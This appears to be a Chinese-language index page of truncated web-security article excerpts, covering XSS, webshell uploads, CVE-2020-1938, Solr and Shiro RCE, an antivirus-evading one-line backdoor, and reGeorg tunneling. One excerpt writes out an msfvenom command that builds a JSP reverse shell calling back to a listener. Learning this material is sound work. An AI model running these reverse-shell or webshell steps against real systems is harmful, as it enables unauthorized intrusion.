本文用思維導圖的方式簡單有力地概括web安全的客戶端方面的攻擊和防禦,主要介紹XSS、CSRF和ClickJacking三種常見的web客戶端攻擊,參考來自《白帽子講web安全》一書
通過burpsuite抓包上傳webshell 先上傳正常圖片; 通過抓包獲得上傳頁面的url以及cookie; 通過明小子的綜合上傳功能上傳webshell; IIS解析漏洞: 1.如果一個目錄以“xxx.asp”的形式命名,那麼該
同源策略: 影響源的因素有host(域名或IP地址,如果是IP地址則看作一個根域名)、子域名、端口、協議; 在瀏覽器中,<script>,<img>,<iframe>,<link>等標籤都是可以跨域加載資源,不受同源策略影響, 這些帶"s
看了大佬的博客,勉強整出來了,詳細的寫一下我的思路。 錯誤思路: 觀察發現是post傳值,想用sqlmap一把嗦,BP抓包=>sqlmap 得到數據庫:web_sqli 表:user 字段:passwd 得到密碼是cdc9c81
每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透
CVE-2020-1938(RCE利用) 1.使用msf生成反彈shell馬,並且監聽 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R >
Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938) 1.背景 Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器,按照Sun Microsystems提供的技術規範,實現了
Apache Solr 遠程命令執行漏洞(CVE-2019-0193) 聲明:本篇文章僅限用於學習信息安全技術,請勿用於非法途徑! 1.漏洞描述 2019年8月1日,Apache Solr官方發佈了CVE-2019-0193漏洞預警,漏洞
一、前言 本文原創作者:sucppVK,本文屬i春秋原創獎勵計劃,未經許可禁止轉載! 先說明三點: 這個後門就是一句話木馬這個不同於我們常說的圖片馬這個後門是過安全狗的 這個不算什麼新姿勢,只不過被提到的次數比較少 (各大論壇常見的
摘要: web系統經常會做到只允許內部服務器交互的情況,比如我的swoole機器與web機器交互.爲了安全,也爲了方便,我沒有做加密傳輸,而是簡單的做了ip白名單限制 一 上代碼 config.php //ip白名單配
跨站腳本攻擊(Cross Site Script爲了區別於CSS簡稱爲XSS)指的是惡意攻擊者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。 一個簡單的留
場景: WEB程序容易被SQL注入攻擊,攻擊原理是在請求參數中傳入非法字符,造成SQL語句出現出現異常情況,已達到攻擊者想要的結果。 分析: 一般的攻擊者都是在傳入的請求參數上做文章,所以我們重點檢查的是request的參數,判斷requ
前言: Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。 影響版本: Apache Shiro <= 1.2.4 漏洞原理: Apache Sh
前言: 在學習了網絡安全之後,我們知道了公網和私網(內網),私網是不能直接在公網傳輸和通信的。比如一個學校,一個公司,都是單獨在自己的私網裏面,通過這個私網內部的路由器(NAPT方式)和外界通信。那麼如果A公司的員工要和B公司的員
phpMyAdmin開啓遠程登陸導致本地文件讀取 下面我們先去分析復現下這個漏洞。 $cfg['AllowArbitraryServer'] = true; //false改爲true 則登錄時就可以訪問遠程的服務器。當登陸一個
利用方式: 工具: reGeory 下載地址:https://github.com/sensepost/reGeorg Proxifier 下載地址:https://www.proxifier.com 第一步:將tunnel.no